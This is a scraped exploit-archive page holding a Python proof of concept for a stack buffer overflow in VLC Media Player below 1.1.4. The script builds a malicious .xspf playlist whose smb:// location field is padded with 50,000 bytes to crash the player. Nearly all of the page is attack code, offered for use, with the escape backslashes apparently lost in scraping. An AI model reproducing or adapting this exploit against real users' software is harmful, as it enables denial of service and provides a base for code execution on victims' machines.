Home / os / win7

VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Stac

Posted on 04 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>VLC Media Player &lt; 1.1.4 (.xspf) smb:// URI Handling Stack Overflow PoC</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=======================================================================
VLC Media Player &lt; 1.1.4 (.xspf) smb:// URI Handling Stack Overflow PoC
=======================================================================

#!/usr/bin/python
#
# Exploit Title:    VLC Media Player &lt; 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC
# Date:          04-09-2010
# Author:       Hadji Samir   , s-Dz[at]hotmail[dot]fr
# Software Link:    http://sourceforge.net/projects/vlc/files/1.1.4/win32/vlc-1.1.4-win32.exe/download?use_mirror=garr
# Version:      VLC Media Player &lt; 1.1.4
# Tested on:    Windows XP sp2 with VLC 1.1.4
# CVE :
# Notes:        Samir tjrs mahboul-3lik ...
#           
###############################################################################################################    
   
 
data1 = (
&quot;x3Cx3Fx78x6Dx6Cx20x76x65x72x73x69x6Fx6Ex3Dx22x31&quot;
&quot;x2Ex30x22x20x65x6Ex63x6Fx64x69x6Ex67x3Dx22x55x54&quot;
&quot;x46x2Dx38x22x3Fx3Ex0Dx0Ax3Cx70x6Cx61x79x6Cx69x73&quot;
&quot;x74x20x76x65x72x73x69x6Fx6Ex3Dx22x31x22x20x78x6D&quot; 
&quot;x6Cx6Ex73x3Dx22x68x74x74x70x3Ax2Fx2Fx77x77x77x2E&quot;
&quot;x65x78x65x6Dx70x6Cx65x2Ex6Fx72x67x2Fx22x20x78x6D&quot; 
&quot;x6Cx6Ex73x3Ax76x6Cx63x3Dx22x68x74x74x70x3Ax2Fx2F&quot;
&quot;x77x77x77x2Ex65x78x65x6Dx70x6Cx65x2Ex6Fx72x67x2F&quot; 
&quot;x22x3Ex0Dx0Ax09x3Cx74x69x74x6Cx65x3Ex50x6Cx61x79&quot; 
&quot;x6Cx69x73x74x3Cx2Fx74x69x74x6Cx65x3Ex0Dx0Ax09x3C&quot;
&quot;x74x72x61x63x6Bx4Cx69x73x74x3Ex0Dx0Ax09x09x3Cx74&quot;
&quot;x72x61x63x6Bx3Ex0Dx0Ax09x09x09x3Cx6Cx6Fx63x61x74&quot;
&quot;x69x6Fx6Ex3Ex73x6Dx62x3Ax2Fx2Fx65x78x61x6Dx70x6C&quot;
&quot;x65x2Ex63x6Fx6Dx40x77x77x77x2Ex65x78x61x6Dx70x6C&quot; 
&quot;x65x2Ex63x6Fx6Dx2Fx23x7B&quot;)
 
buff = (&quot;x41&quot; * 50000 )
 
data2 = (
&quot;x7Dx3Cx2Fx6Cx6Fx63x61x74x69x6Fx6Ex3E&quot;
&quot;x3Cx65x78x74x65x6Ex73x69x6Fx6Ex20x61x70x70x6Cx69&quot;
&quot;x63x61x74x69x6Fx6Ex3Dx22x68x74x74x70x3Ax2Fx2Fx77&quot;
&quot;x77x77x2Ex76x69x64x65x6Fx6Cx61x6Ex2Ex6Fx72x67x2F&quot;
&quot;x76x6Cx63x2Fx70x6Cx61x79x6Cx69x73x74x2Fx30x22x3E&quot;
&quot;x0Dx0Ax09x09x09x09x3Cx76x6Cx63x3Ax69x64x3Ex30x3C&quot; 
&quot;x2Fx76x6Cx63x3Ax69x64x3Ex0Dx0Ax09x09x09x3Cx2Fx65&quot;
&quot;x78x74x65x6Ex73x69x6Fx6Ex3Ex0Dx0Ax09x09x3Cx2Fx74&quot;
&quot;x72x61x63x6Bx3Ex0Dx0Ax09x3Cx2Fx74x72x61x63x6Bx4C&quot;
&quot;x69x73x74x3Ex0Dx0Ax3Cx2Fx70x6Cx61x79x6Cx69x73x74&quot;
&quot;x3Ex0Dx0Ax0Dx0A&quot;)
 
wizz = open(&quot;Mahboul-3lik.xspf&quot;,&quot;w&quot;)
wizz.write(data1 + buff + data2)
wizz.close() 


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-04]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :